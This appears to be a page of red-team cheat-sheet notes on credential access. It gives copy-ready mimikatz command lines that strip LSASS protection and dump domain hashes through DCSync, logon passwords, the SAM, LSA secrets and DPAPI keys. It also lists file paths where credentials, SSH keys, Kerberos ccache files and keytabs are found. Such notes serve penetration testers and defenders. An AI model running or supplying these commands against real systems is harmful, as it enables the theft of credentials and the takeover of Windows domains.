Credentials

From File

C:\program files\xxx\mail.ps1

C:\inetpub\wwwroot\loginform.aspx

Dcsync

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "lsadump::dcsync /domain:red.com /user:red\Administrator"exit

logonpasswords

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::logonpasswords"exit

SAM

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::sam"exit

Secret

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::secrets"exit

DPAPI

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::dpapi"exit

SSH Key

  • id_rsa: Could be other user's.

  • authorized_keys

  • known_hosts

Ansible

/opt/web.yml

Jfrog

ccache

/tmp/krb5cc_alice

keytab

/etc/krb5.keytab

PreviousAMSI, CLM, & App LockerNextLateral Movement

Last updated